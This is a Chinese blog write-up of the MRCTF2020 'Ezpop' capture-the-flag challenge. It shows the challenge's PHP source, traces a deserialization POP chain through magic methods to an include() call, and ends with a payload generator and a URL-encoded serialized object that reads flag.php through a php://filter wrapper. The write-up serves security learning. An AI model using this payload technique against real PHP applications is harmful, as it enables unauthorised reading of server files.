[MRCTF2020]Ezpop解析

最新推荐文章于 2024-03-15 23:57:51 发布
最新推荐文章于 2024-03-15 23:57:51 发布
阅读量206 收藏
点赞数
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43981050/article/details/131472391
版权

文章目录

一、题目源码

<?php
//flag is in flag.php
//WTF IS THIS?
//Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95
//And Crack It!
class Modifier {
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Show{
    public $source;
    public $str;
    public function __construct($file='index.php'){
        $this->source = $file;
        echo 'Welcome to '.$this->source."<br>";
    }
    public function __toString(){
        return $this->str->source;
    }

    public function __wakeup(){
        if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
            echo "hacker";
            $this->source = "index.php";
        }
    }
}

class Test{
    public $p;
    public function __construct(){
        $this->p = array();
    }

    public function __get($key){
        $function = $this->p;
        return $function();
    }
}

if(isset($_GET['pop'])){
    @unserialize($_GET['pop']);
}
else{
    $a=new Show;
    highlight_file(__FILE__);
}

二、魔术函数介绍

魔法函数:
__invoke():
当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用。
 
__construct():
创建类对象时自动调用 当使用 new 操作符创建一个类的实例时,构造方法将会自动调用
 
__toString():
__toString()会在需要转成字符串时, 会隐式自动调用它, 在PHP内部. 这个也是来自JAVA的
当一个对象被当作一个字符串被调用。
 
__wakeup():
使用unserialize时触发
 
__get()    用于从不可访问的属性读取数据
#难以访问包括:(1)私有属性,(2)没有初始化的属性

三、分析

1)通过get传递序列化Show对象参数$pop,此时会对$pop变量进行反序列化从而调用__wakeup()函数

2)可以看到类Show的函数__construct对变量$this->source进行echo输出,如果这里的变量$this->source为Show对象的话,那么就会调用函数_toString()

3)__toString函数返回了一个变量$this->str->soucre,此时类Test中存在__get函数,我们可以将$this->str赋值为一个Test对象,而Test类中并没有source这个变量,因此将会调用__get函数

4)类Modifier中存在__invoke函数,可以第三步中类Test的__get函数将this->p传递给$function并且return $function(),只要将$this->p赋值为一个Modifier对象,那么就会返回一个Modifier类对象的函数,将会调用Modifier类中的__invoke函数

5)__invoke函数调用了append函数,只要将变量$var的内容设为我们需要包含的文件伪协议读取命令就可以了

四、payload

<?php
class Modifier {
    protected  $var="php://filter/read=convert.base64-encode/resource=flag.php";
}
class Show{
    public $source;
    public $str;
}
class Test{
    public $p;
}

$a = new Show();
$b= new Show();
$a->source=$b;
$b->str=new Test();
($b->str)->p=new Modifier();
echo urlencode(serialize($a));
?>

令pop=

O%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BO%3A4%3A%22Show%22%3A2%3A%7Bs%3A6%3A%22source%22%3BN%3Bs%3A3%3A%22str%22%3BO%3A4%3A%22Test%22%3A1%3A%7Bs%3A1%3A%22p%22%3BO%3A8%3A%22Modifier%22%3A1%3A%7Bs%3A6%3A%22%00%2A%00var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A3%3A%22str%22%3Bs%3A0%3A%22%22%3B%7D

五、序列化结构

在这里插入图片描述

明丨通
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vigenere-cipher:Vigenere密码
03-19
虚拟密码 vigenere密码是一种利用密钥的加密和解密方法。它由重复26行/列的字母表组成,但是第一个字母被推到字母表的末尾,并且一直持续到z是第25行中的第一个字母为止。然后,程序将密钥用于行,将消息加密用于列。字母匹配,并显示加密的消息。标点和空格保持不变。
向前欧拉法matlab代码-zbc-ops:我的GitHub个人资料的配置文件
05-20
向前欧拉法matlab代码 本周还是刷题,深入学习了winner攻击以及extend winner attack.然后就是做了几个有关造格子的题,没学很多,挺忙的。 直接从博客复制过来的,格式和markdown显示有点问题,更多可以看博客 1.mrctf[friendly_sign-in] 意思就是服务器产生一个数组$N$,需要输入一个数组$X$与其对应位置乘积和为$0$,题目说$N$中全为素数,实际好像不是,因为产生这么多素数比较耗时间,但里面还是大部分都是素数。这里可以利用里面任意两个素数$N_i,N_j$,用扩展欧几里得算法求到满足$x_iN_i+x_jN_j=1$的$x_i,x_j$的值,设 $C=\sum\limits_{k=0}^{len(N)-1}N_k(k\ne i\ne j)$,那么$Cx_iN_i+Cx_jN_j=C$,即$Cx_iN_i+Cx_jN_j+\sum\limits_{i=1}^{len(N)-1}(-1)N_i(i\ne i\ne j)=0$,就是说数组$X$对应$i,j$位置为$x_i,x_j$,其余全为$-1$,即可满足。 选择不同的素数对,传$l
【buuctf】MRCTF2020-Ezpop小白详解
最新发布
m0_73860001的博客
03-15 873
真的很详细
采区含断层工作面冲击失稳预测
04-19
本文以矿井西二采区某一工作面为工程背景,根据数值模拟峰前扰动时断层面应力、位移分叉趋势对断层冲击地压危险区域进行了初步划分,通过现场电磁辐射监测结果分析可知:预测的预警距离是工作面距断层35m时应当采取加强支护,保证工作面的稳定生产。
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
BUUCTF [MRCTF2020]Ezpop 详解
lzu_lfl的博客
11-09 577
pop链
[MRCTF2020]Ezpop(详解)
pakho_C的博客
07-29 2225
将pop对象的参数source作为Show类的对象(此时source对象也有两个参数source和str),则会执行__toString()函数,returnsource对象的str参数的source,此时str如果是Test类的一个对象,则没有source参数,执行__toString()函数则会找不到source参数,就会调用Test类对象str的__get()函数。所以可以将参数p设置为Modifier类的对象,从而执行__invoke()函数,进而执行append函数。...
[MRCTF2020]Ezpop
Sk1y的博客
05-04 988
考查点:php反序列化链
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 353
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
[MRCTF2020]EasyCpp
m0_46296905的博客
04-20 835
题目:[MRCTF2020]EasyCpp 这题是一个用g++编译的C++逆向题,第一次碰到这种类型,边做边学习吧。 因为是初次接触C++逆向,如有不足,欢迎评论区指正。 一、main IDA64查看main函数的伪代码如下,各个反汇编后伪代码的注释也已经给出,仅供参考: int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rax __int64 v4; // rbx __int6
buuctf-[MRCTF2020]Ezpop)(小宇特详解)
小宇的web博客
04-04 2937
buuctf-[MRCTF2020]Ezpop(小宇特详解) 1.先查看题目,题目是eazypop,说明这道题是让构造简单的pop链 Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%9
国赛ezpop题目复现(tp6)
m0_62422842的博客
07-21 621
顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。
MRCTF2020」- Ezpop
ro4lsc的博客
05-14 2276
MRCTF2020」- Ezpop 做了一个星期的反序列化,不知道为啥,概念从模糊到清晰再到模糊,看来还是基础不扎实导致的,所以就有了这一篇文章的诞生,思路的一个整理以及POP链的构造需要再熟悉熟悉 俗话说的好,有ez的题目都不ez,那么这个题同样也不ez 重新复习一下php里面反序列化序列化的几大魔术方法 __destruct(类执行完毕以后调用,其最主要的作用是拿来做垃圾回收机制。) __construct(类一执行就开始调用,其作用是拿来初始化一些值。) __toString(在对象当做字符串的

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值